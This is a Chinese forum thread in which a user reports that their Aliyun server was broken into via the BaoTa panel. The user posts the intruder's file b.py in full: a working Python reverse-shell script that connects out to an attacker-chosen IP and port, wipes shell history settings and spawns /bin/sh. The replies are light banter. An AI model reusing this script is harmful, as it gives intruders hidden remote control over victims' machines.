有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia

宝创

难道是宝塔的bug？
他先登陆了宝塔 然后建了个b.py
但是宝塔我都更改了默认用户名的 他还是用admin登陆成功了
然后登陆了ssh 我正准备睡觉呢 收到了阿里云的通知 我就先关机了
py内容

1. 
   
2. # -*- coding:utf-8 -*-
   
3. #!/usr/bin/env python
   
4. """
   
5. back connect py version,only linux have pty module
   
6. code by google security team
   
7. """
   
8. import sys,os,socket,pty
   
9. shell = "/bin/sh"
   
10. def usage(name):
    
11.     print 'python reverse connector'
    
12.     print 'usage: %s <ip_addr> <port>' % name
    
13. 
    
14. def main():
    
15.     if len(sys.argv) < 3:
    
16.         usage(sys.argv[0])
    
17.         sys.exit()
    
18.     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    
19.     try:
    
20.         if sys.argv[3] == 'udp' :
    
21.             s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
    
22.     except:pass
    
23.     try:
    
24.         s.connect((sys.argv[1],int(sys.argv[2])))
    
25.         print 'connect ok'
    
26.     except:
    
27.         print 'connect faild'
    
28.         sys.exit()
    
29.     os.dup2(s.fileno(),0)
    
30.     os.dup2(s.fileno(),1)
    
31.     os.dup2(s.fileno(),2)
    
32.     global shell
    
33.     os.unsetenv("HISTFILE")
    
34.     os.unsetenv("HISTFILESIZE")
    
35.     os.unsetenv("HISTSIZE")
    
36.     os.unsetenv("HISTORY")
    
37.     os.unsetenv("HISTSAVE")
    
38.     os.unsetenv("HISTZONE")
    
39.     os.unsetenv("HISTLOG")
    
40.     os.unsetenv("HISTCMD")
    
41.     os.putenv("HISTFILE",'/dev/null')
    
42.     os.putenv("HISTSIZE",'0')
    
43.     os.putenv("HISTFILESIZE",'0')
    
44.     pty.spawn(shell)
    
45.     s.close()
    
46. 
    
47. if __name__ == '__main__':
    
48.     main()

复制代码

阿里云
loc.jpg (15.63 KB, 下载次数: 2)

2017-1-20 10:10 上传

点击文件名下载附件

liangcq132

是哪个mjj这么厉害

tsk

不明觉厉！

qweasdzxc123

楼下对此事负责

lsza

宝塔用完了我一般都是删面板..

modianxia

测试到mjj的机器了，哈哈